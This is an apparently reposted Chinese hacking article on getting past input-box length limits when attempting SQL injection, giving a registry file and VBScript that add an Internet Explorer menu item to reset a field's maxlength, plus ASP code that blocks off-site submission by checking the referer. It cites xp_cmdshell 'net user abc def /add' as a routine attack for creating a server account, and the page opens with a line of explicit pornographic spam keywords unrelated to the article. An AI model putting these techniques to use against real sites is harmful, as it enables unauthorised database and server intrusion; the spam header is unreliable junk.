欧美性猛交黑人xxxx,成人毛片一区二区三区,久久综合九色综合精品,男的把j放进女人下面视频免费

突破SQL注入攻擊時輸入框長度的限制

  • 發布于:2023-10-13
  • 191 人圍觀

   前天TK研究的一個網頁改COOKIE的小玩意兒給我了一點點靈感。昨晚又和adam聊了聊SQL注入,今早上來就寫了這篇東東。xp_cmdshell 'net user abc def /add'這些命令大家想必都用爛了吧,但是在實際的測試中我們常常會遇到這樣的情況,服務器的asp腳本沒有對用戶的輸入做限制,但是在網頁上通過對輸入框設置maxlength屬性使我們的很多攻擊就不能進行。
有些人可能會想到把網頁考到本地,然后本地提交但是有一個問題是有的網站通過簡單的比較HTTP_REFERER和SERVER_NAME的值就可以防止。
     好了很多人沒辦法了吧,除了寫SOCKET程序改變HTTP_REFERER還有一個更簡單的辦法.
------------len.reg-----------------
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\擴展(&E)]
@="C:\\Documents and Settings\\Administrator\\桌面\\len.htm"
"contexts"=dword:00000004

-----------end----------------------

-----------len.htm------------------
<script language=vbs>
set srcevent = external.menuarguments.event
set doc=external.menuarguments.document
set ele=doc.elementfrompoint( srcevent.clientx, srcevent.clienty )
if ele.type ="text" or ele.type="password" then
ele.maxlength=200
ele.size=200
end if
</script>
----------end-----------------------

用法:先把len.reg導入注冊表(注意文件路徑)
然后把len.htm拷到注冊表中指定的地方.
打開網頁,光標放在要改變長度的輸入框上點右鍵,看多了一個叫擴展的選項了吧
單擊搞定!

后記:同樣的也就可以對付那些限制輸入內容的腳本了.

附:防止本地提交的ASP代碼.
<%
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
if mid(server_v1,8,len(server_v2))<>server_v2 then
response.write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=#EEEEEE width=450>"
response.write "<tr><td style='font:9pt Verdana'>"
response.write "你提交的路徑有誤,禁止從站點外部提交數據請不要亂該參數!"
response.write "</td></tr></table></center>"
response.end
end if
%>

萬企互聯
標簽: